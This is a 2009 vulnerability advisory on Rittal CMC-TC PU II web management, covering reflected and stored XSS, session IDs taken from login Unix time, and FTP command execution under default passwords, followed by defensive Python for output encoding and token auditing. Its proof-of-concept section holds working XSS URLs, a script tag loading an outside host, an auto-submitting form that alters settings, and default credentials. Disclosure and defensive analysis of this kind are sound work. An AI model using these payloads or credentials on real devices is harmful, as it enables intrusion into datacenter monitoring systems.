Rittal CMC-TC Processing Unit II XSS / Command Execution

23 Mar 2009 | Reported by Henri Lindberg | Type: packetstorm | Source: packetstormsecurity.com

Rittal CMC-TC PU II multiple vulnerabilities: XSS, Command Execution

Code
` Louhi Networks Oy  
-= Security Advisory =-  
  
  
Advisory: Rittal CMC-TC Processing Unit II  
multiple vulnerabilities  
Release Date: 2009-03-23  
Last Modified: 2009-03-22  
Authors: Henri Lindberg, CISA  
[henri d0t lindberg at louhi d0t fi]  
  
Application: Rittal CMC-TC PU II Web management  
  
Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,  
possibly other Rittal products  
  
Attack type : XSS Type I, XSS Type II, Session prediction,  
Remote command execution in default configuration  
Severity: Moderate  
Vendor Status: Vendor notified.  
Patch already available for XSS vulnerabilities.  
Other vulnerabilities will be addressed in a future  
version, no release date set.  
References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt  
  
  
Overview:  
Quote from http://www.rimatrix5.com/ :  
"The Computer Multi Control Top-Concept (CMC-TC) from Rittal is  
a complete security management for preventive protection to guard  
against consequential costs, and is the central organisational unit  
for linking to the facility management.  
...  
Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring  
system. The PU II is the coordinator between the sensor unit and the  
network. It is configured via the integral Web server."  
  
Details:  
  
Several vulnerabilities were identified in the CMC-TC PU II web  
interface. These include XSS Type I, XSS Type II, weak session  
management and an insecure default configuration.  
  
XSS Type 1:  
-----------  
The web application fails to validate and/or HTML-encode user input  
when handling erroneous requests. This allows an attacker to inject  
HTML and client-side scripts into the victim's browser by crafting  
suitable links.  
  
This vulnerability cannot be used for session hijacking, because  
CMC-TC PU II requires each valid request to contain current session  
ID as URL parameter. Requests without session ID are redirected to  
the login page. Therefore only phishing-type attacks or attacks  
against user's browser are possible.  
  
Successful exploitation requires that attacker can lure or force  
the user to follow the malicious link.  
  
XSS Type 2:  
-----------  
The web application fails to sanitize and/or HTML-encode user input on  
the system information page. This allows an attacker to backdoor the  
device with HTML and browser-interpreted content (such as ECMAScript  
dialects or other client-side scripts), as the content is always  
displayed after login. Persistent XSS allows an attacker to modify the  
displayed content or to change the victim's password (since the old  
password is not required for password changes).  
  
Successful exploitation requires access to the web management  
interface, either with valid credentials or a hijacked session.  
  
Weak session management:  
------------------------  
CMC-TC PU II uses the Unix time of the login moment as the session  
identifier, so the identifier has insufficient randomness.  
  
If administrator login time is known and session is still valid, it  
can be brute-forced with relatively little effort. Proof-of-concept  
tool is provided, but any web application security tool (such as  
Burp Intruder) can be used for this.  
  
Successful exploitation requires that administrator login time is  
known (or a reasonably accurate guess can be made) and the session  
is still active.  
  
Insecure default configuration:  
-------------------------------  
If the default administrator password is not changed, an attacker can  
run arbitrary commands and modify the system software by uploading  
malicious update scripts via FTP. See the update packet script contents  
for detailed information about the update process (e.g. update_l.sh).  
  
The software update packet expects the default password to be in  
place, since the FTP upload script contains the hardcoded default  
password. The update fails without any error if it has been changed.  
  
What makes this interesting is the fact that the device does not  
offer operating system level access through any of the other  
management interfaces. Telnet and SSH both offer a menu based  
administration interface.  
  
Successful exploitation requires default administrator password and  
access to ftp port of the target device.  
  
Remediation:  
* Restrict unauthorized network access to device  
* Change default passwords (instructions provided in Operation  
Manual)  
* Install patched Version 2.60a  
* Update future patch version as soon as available  
* Configure web interface to 'view only'  
* Review device configuration after an administrator has been let go  
* Do not follow untrusted links  
  
Timeline:  
* 2008-xx-xx Issues discovered  
  
* 2009-02-25 Contacted vendor via e-mail  
  
* 2009-03-02 Contacted vendor via e-mail  
  
* 2009-03-02 Vendor response.  
XSS vulnerabilities were already fixed independently.  
  
  
http://www.rittal.de/downloads/Software/de/CMC_TC/18_update_processing_unit2/PU2_Update_v2.60a.zip  
  
http://www.rittal.de/downloads/Software/en/CMC_TC/12_CMC_TC_Processing_unit/7320100V33e.pdf  
  
Quote from vendor (sic):  
  
"thank you very much by the security information XXS.  
We have seen, your customer has check the PUII SW V2.45.  
Actual we have a better Version 2.60a with more seyurity.  
Our XXS-Check of that Version is OK.  
If you has by the basic more information for Rittal,  
we are fine to get . "  
  
* 2009-03-02 Contacted vendor via e-mail requesting information about  
weak session management and public disclosure of XSS  
vulnerabilities.  
  
* 2009-03-02 Discovered issues regarding default configuration from  
update packages  
  
* 2009-03-16 Contacted vendor via e-mail requesting information  
regarding vulnerabilities and stating intent to release  
the advisory  
  
* 2009-03-19 Vendor response. Promises to patch vulnerabilities in a  
future version.  
  
* 2009-03-19 Contacted vendor via e-mail requesting release date for  
the update.  
  
* 2009-03-20 Vendor response. Release date not set.  
  
* 2009-03-20 Contacted vendor via e-mail stating intent to release  
the advisory. Delivered draft version of advisory.  
  
  
Proof-of-Concept:  
  
0) XSS Type 1 / Reflected  
  
http://cmc.example.com/cmclogin.cgi?Fredo=%3Cscript%3Ealert('You%20broke%20my%20heart.You%20broke%20my%20heart');%3C/script%3E  
  
http://cmc.example.com/cmcget.cgi?46010%3CSCRIPT%3Ealert('I%20know%20it%20was%20you.');%3C/SCRIPT%3E  
  
  
1) XSS Type 2 / Persistent  
Setup - General - Location: <script src="http://l7.fi"></script>  
  
1234567890 is the unixtime for administrator's login.  
  
<html>  
<head><title>42</title></head>  
<body onload="document.backdoor.submit()">  
<form ACTION=http://1.1.1.1/cmcget.cgi?630101011234567890 METHOD=POST  
name="backdoor">  
<input name="p001" value="Initech Datacenter CMC-TC PU #42">  
<input name="p002" value="Compton, LA county">  
<input name="p003" value="[email protected]">  
<input name="p004" value="0">  
<input name="p005" value="0">  
<input name="p005" value="1">  
<input name="p006" value="0">  
<input name="p006" value="1">  
<input name="p007" value="1">  
<input name="p008" value="04.02.2000">  
<input name="p009" value="04:20:00">  
</form>  
</body>  
</html>  
  
2) Session prediction  
  
Proof-of-concept brute force tool available at  
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip  
http://milw0rm.com/sploits/2009-Louhi_CMC-brute_090323.zip  
  
  
Other information:  
* Default username and password are cmc  
* Default administrator username and password are admin  
* Device supports following protocols TCP/IP, SNMPv1, SNMPv3, FTP,  
SFTP, SMTP, HTTPS, NTP, SSH, PPP, DHCP. Further research is  
highly encouraged.  
  
  
"Six pints of bitter. And quickly please, the world's about to end."  
-- Ford Prefect  
  
Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,  
no liabilities, information provided 'as is' for educational purposes.  
Reproduction allowed as long as credit is given. Information wants to  
be free.  
  
  
`
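The two XSS findings above (reflected output in error handling, and the stored Location value shown on the system information page) share one root cause: stored or reflected values are written into the page without output encoding. The block below is an added illustration, not code from the advisory or from Rittal: it renders a constructed configuration record both ways and includes a defensive scan over stored values that flags fields already carrying executable markup (the kind of check an operator would run when reviewing device configuration after an administrator has been let go, as the remediation list suggests). The field names and the rendering layout are assumptions; the Location payload is the one quoted in the advisory.

```python
import html
import re

# Constructed sample of stored configuration values of the kind the advisory
# describes. The "location" value is the payload quoted in the advisory; the
# field names are hypothetical labels, not the device's own parameters.
STORED_CONFIG = {
    "name": "Initech Datacenter CMC-TC PU #42",
    "location": '<script src="http://l7.fi"></script>',
    "contact": "ops@example.invalid",
}


def render_vulnerable(config):
    """Interpolates stored values verbatim, as the advisory says the system
    information page does; any markup stored in a field is interpreted."""
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in config.items())
    return f"<table>{rows}</table>"


def render_hardened(config):
    """Same page, but every value is HTML-encoded on output, so stored markup
    is displayed as text instead of being executed by the browser. The same
    encoding step fixes the reflected case: encode the echoed request data."""
    rows = "".join(
        f"<tr><td>{html.escape(k, quote=True)}</td>"
        f"<td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in config.items()
    )
    return f"<table>{rows}</table>"


# Markup fragments a browser would act on if they reach the page unencoded.
ACTIVE_CONTENT = re.compile(r"<\s*script|<\s*iframe|\bon[a-z]+\s*=|javascript:", re.I)


def find_active_content(config):
    """Defensive review check over stored configuration: returns the names of
    fields whose current value already contains browser-executable markup."""
    return sorted(k for k, v in config.items() if ACTIVE_CONTENT.search(v))


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(STORED_CONFIG))
    print("hardened:  ", render_hardened(STORED_CONFIG))
    print("fields to inspect:", find_active_content(STORED_CONFIG))
```

Output encoding must match the context the value lands in; `html.escape(..., quote=True)` covers text nodes and quoted attribute values, which is what the page rendering above uses, but a value placed inside a script block or a URL needs that context's encoding instead.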

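The "Weak session management" section states that the session identifier is the Unix time of the login, which makes the search space the attacker's uncertainty about the login time rather than a random value. The block below is an added example, not the advisory's proof-of-concept tool and not Rittal code: it gives an audit check that flags tokens containing a run of digits that reads as a Unix time shortly before the request was observed, quantifies the effective entropy for a given login-time uncertainty, and shows the CSPRNG-based generator an application should use instead. The sample token is the identifier from the advisory's proof of concept; the observation time, window sizes and the 10-digit heuristic are assumptions.

```python
import math
import re
import secrets
import time

# Constructed sample: the session identifier shown in the advisory's
# proof of concept, observed on a request ten minutes after the login time
# (1234567890) that it embeds.
SAMPLE_TOKEN = "630101011234567890"
SAMPLE_OBSERVED_AT = 1234567890 + 600

# Overlapping 10-digit runs (lookahead so runs that share digits are all seen).
_DIGIT_RUNS = re.compile(r"(?=(\d{10}))")


def timestamp_like(token, observed_at, max_age_seconds=7 * 24 * 3600):
    """Audit check: does the token contain a 10-digit run that reads as a Unix
    time at or shortly before the moment the request was observed? A token
    that does is derived from wall-clock time, not from a random source."""
    for match in _DIGIT_RUNS.finditer(token):
        candidate = int(match.group(1))
        if observed_at - max_age_seconds <= candidate <= observed_at:
            return True
    return False


def audit_tokens(tokens_with_times):
    """Run the check over (token, observed_at) pairs, e.g. values pulled from
    access logs, and return the tokens that look time-derived."""
    return [tok for tok, when in tokens_with_times if timestamp_like(tok, when)]


def guess_space_bits(login_uncertainty_seconds):
    """Effective entropy of a unixtime session id once the login time is known
    to within the given uncertainty: log2 of the number of candidates."""
    return math.log2(max(1, login_uncertainty_seconds))


def secure_session_id(nbytes=32):
    """What the device should issue instead: 32 bytes (256 bits) from the OS
    CSPRNG, URL-safe encoded. Knowing the login time gives no advantage."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    print("sample token time-derived:", timestamp_like(SAMPLE_TOKEN, SAMPLE_OBSERVED_AT))
    print("bits if login known to 1 h: %.1f" % guess_space_bits(3600))
    print("bits if login known to 1 day: %.1f" % guess_space_bits(86400))
    fresh = secure_session_id()
    print("random token time-derived:", timestamp_like(fresh, int(time.time())))
```

The entropy figure is the useful comparison for a risk write-up: an hour of uncertainty about the login time leaves roughly 12 bits to search, a day leaves about 17, while a 32-byte random token gives 256 bits. The audit check is a heuristic (a long digit run that happens to fall in the window), so treat a hit as something to confirm against how the application actually issues identifiers.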
Vulners AI Score: 0.4 (Low risk)